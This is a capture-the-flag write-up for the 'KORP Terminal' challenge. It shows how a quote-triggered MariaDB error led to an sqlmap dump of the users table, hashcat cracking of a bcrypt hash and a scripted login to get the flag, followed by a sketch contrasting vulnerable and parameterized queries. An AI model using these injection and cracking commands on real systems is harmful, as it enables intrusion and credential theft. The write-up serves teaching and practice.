Tags: ssti web 

# KORP Terminal

Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.

## Writeup

On the site, if we send a **username** equal to **'**, this error message appears:

```json
{"error":{"message":["1064","1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1","42000"],"type":"ProgrammingError"}}
```

The raw database error shows that the username reaches the query unescaped, so we can use **SQL injection** on **MariaDB** with **sqlmap**:

```bash
sqlmap -u "http://83.136.252.82:33660/" --forms --dump --ignore-code 401
```

This is the output:

```
Database: korp_terminal
Table: users
[1 entry]
+----+--------------------------------------------------------------+----------+
| id | password                                                     | username |
+----+--------------------------------------------------------------+----------+
| 1  | $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. | admin    |
+----+--------------------------------------------------------------+----------+
```

The password is stored as a bcrypt hash (hashcat mode 3200), so we can try to crack it with a wordlist:

```bash
hashcat -m 3200 '$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.' /usr/share/wordlists/rockyou.txt
```

With this output:

```
$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123
```

Now we can log in with the recovered credentials to extract the flag:

```python
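#!/usr/bin/python3
import requests

# Challenge instance
ip = "83.136.252.82"
port = 33660

url = f"http://{ip}:{port}/"

# Credentials recovered from the dumped users table
username = "admin"
password = "password123"

data = {
    'username': username,
    'password': password
}

# Submit the login form; the response body contains the flag
req = requests.post(url, data=data, timeout=10)
print(req.text)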
```

This is the flag:

```
HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}
```
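
The error at the start of this writeup appears when a login handler concatenates the username into the SQL text and returns the driver exception to the client. The sketch below is an added example, not the challenge's code or part of the original writeup: it reproduces that pattern next to a parameterized fix, using Python's `sqlite3` as an offline stand-in for MariaDB, with hypothetical function names and a constructed table.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the challenge's users table
    # (sqlite3 instead of MariaDB so the example runs offline).
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    db.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", "<bcrypt-hash-placeholder>"),
    )
    return db


def lookup_vulnerable(db, username):
    # Assumed shape of the flaw: user input becomes part of the SQL text,
    # so a lone quote changes the statement's syntax.
    query = f"SELECT password FROM users WHERE username = '{username}'"
    try:
        row = db.execute(query).fetchone()
    except sqlite3.Error as exc:
        # Second flaw: the driver error is returned to the client, which
        # confirms the injection point and identifies the database engine.
        return {"error": {"message": str(exc), "type": type(exc).__name__}}
    return {"found": row is not None}


def lookup_hardened(db, username):
    # The placeholder keeps input as data; the SQL text never changes.
    try:
        row = db.execute(
            "SELECT password FROM users WHERE username = ?", (username,)
        ).fetchone()
    except sqlite3.Error:
        # Generic message to the client; details belong in server-side logs.
        return {"error": "Invalid credentials"}
    return {"found": row is not None}


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "'"))  # leaks a SQL syntax error
    print(lookup_hardened(db, "'"))    # treated as an unknown username
```

With the parameterized version, a username of `'` is simply a name that matches no row, so there is no syntax error to leak and nothing for an automated injection scanner to build on.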

Original writeup (https://github.com/MicheleMosca/CTF/blob/main/Cyber%20Apocalypse%202024/web/KORP%20Terminal/README.md).